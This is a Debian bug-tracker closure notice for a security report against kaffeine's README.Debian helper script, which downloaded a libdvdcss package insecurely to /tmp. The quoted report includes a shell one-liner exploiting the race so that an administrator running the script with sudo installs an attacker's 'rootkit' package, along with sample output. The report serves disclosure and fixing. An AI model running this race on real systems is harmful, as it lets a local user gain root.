Your message dated Mon, 09 Aug 2010 15:30:48 +0200
with message-id <>
and subject line Re: insecure temporary file /tmp/libdvdcss.deb
has caused the Debian Bug report #554772,
regarding insecure temporary file /tmp/libdvdcss.deb
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact

Debian Bug Tracking System
Contact with problems
--- Begin Message ---
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm 
/tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/
--2009-11-06 13:54:46--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information

--- End Message ---
--- Begin Message ---
Version: 1.0-1

I had a look in version 1.0-1 in testing, and the
/usr/share/doc/kaffeine/ no longer exist in the package.
Because of this, I believe this bug can be closed.

Did not find anything about its removal in the debian changelog, so I
do not know which in version it was taken away.

Happy hacking,
Petter Reinholdtsen

--- End Message ---
pkg-kde-extras mailing list

Reply via email to